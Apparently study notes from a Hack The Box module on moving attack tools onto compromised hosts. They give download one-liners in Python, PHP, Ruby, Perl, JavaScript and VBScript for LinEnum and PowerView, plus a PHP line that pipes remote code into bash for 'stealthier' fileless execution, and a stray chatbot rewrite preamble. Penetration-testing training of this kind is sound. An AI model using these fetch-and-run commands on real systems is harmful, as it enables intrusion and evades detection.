Downloading Files

Python

Python is a popular programming language. Currently, version 3 is supported, but we may find servers where Python version 2.7 still exists. Python can run one-liners from an operating system command line using the option -c. Let's see some examples:

Python 2 - Download

z3tssu@htb[/htb]$ python2.7 -c 'import urllib;urllib.urlretrieve ("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'

Python 3 - Download

z3tssu@htb[/htb]$ python3 -c 'import urllib.request;urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'

---

PHP File Transfers

Did you know PHP powers over 77% of websites with a known server-side language? 🤯 So when you’re doing offensive security, expect to see PHP a lot — and it has some very handy tricks for transferring files. ⚔️

Let’s dive into 3 solid ways to download files using PHP — from saving to disk to fileless piping into bash!

---

PHP Download and save a file locally:

This is the quick and dirty one-liner

php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh", $file);'

📌 This does:

1. Fetches the remote file using file_get_contents() 🌐

2. Saves it as LinEnum.sh using file_put_contents() 💾

---

PHP Download Using fopen() + Buffer Read

Want more control or need to download large files? Use fopen() with a buffer:

php -r 'const BUFFER = 1024; $fremote = fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'

✅ Benefits:

• Handles large files better

• Allows buffered downloads (less memory, smoother transfers) 🧠

---

Fileless PHP Execution

Just like with curl or wget, PHP can download and pipe code directly into bash:

php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash

📌 This will:

• Download the file line-by-line with file()

• Echo the contents to stdout

• Pipe it straight to bash for execution 🚀

No files saved = stealthier ops 🕵️‍♂️

---

Ruby – Download a File

ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))'

📌 What’s happening?

• require "net/http": loads Ruby’s HTTP client 📡

• Net::HTTP.get(...): fetches the file 🌍

• File.write(...): saves it locally as LinEnum.sh 💾

Super clean and easy for Ruby fans!

---

Perl – Download

perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");'

📌 What’s going on?

• use LWP::Simple: loads Perl’s web request module 📡

• getstore(...): grabs the file and saves it locally 💽

Absolutely! Here's your JavaScript-based file download guide, rewritten in a fun, clear, and engaging format — perfect for anyone exploring Windows scripting tricks! 💻📦🎯

---

JavaScript for File Downloads on Windows

---

💾 The Plan: Download a File Using JavaScript + cscript.exe

We’ll create a tiny JavaScript file that:

1. Opens a web request 🌐

2. Fetches a remote file 📦

3. Saves it to disk 💽

---

📝 Step 1: Create wget.js

Create a file named wget.js and paste this code inside:

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();

BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1; // binary
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));

📌 This script:

• Uses WinHttpRequest to download the file

• Streams the binary data using ADODB.Stream

• Saves the result to the specified local file

---

⚙️ Step 2: Execute with cscript.exe

Run the script with:

C:\htb> cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1

📌 Breakdown:

• /nologo: hides the banner clutter 🧹

• wget.js: your script

• First argument: URL to download

• Second argument: Local filename to save as

🎉 Result: The PowerView.ps1 script is downloaded and saved right in your current directory!

---

VBScript File Downloads on Windows

VBScript (Visual Basic Scripting Edition) is an old-school but still useful scripting language baked into Windows since the days of Windows 98! 💾

And guess what? You can use it to download files from the internet — no external tools required! Perfect for Red Teaming, CTFs, or locked-down environments. 🕵️‍♂️🔐

---

Step 1: Create wget.vbs

Open Notepad (or any text editor) and paste this code:

dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send

with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2
end with

📌 What's happening:

• Microsoft.XMLHTTP → sends the GET request 🌐

• Adodb.Stream → handles the binary file stream 💾

• Arguments = URL to download + local file to save as

---

Step 2: Run It with cscript.exe

Open Command Prompt or PowerShell, then run:

C:\htb> cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1

📌 What it does:

• Downloads the PowerView.ps1 script from GitHub

• Saves it as PowerView2.ps1 in the current folder

✅ No PowerShell, curl, or bitsadmin needed!

---

💡 Bonus Tip

If HTTPS fails (older systems), you can host your files on a local web server using HTTP (e.g., Python http.server), then fetch using VBScript like this:

cscript.exe /nologo wget.vbs http://192.168.1.100/file.ps1 file.ps1

---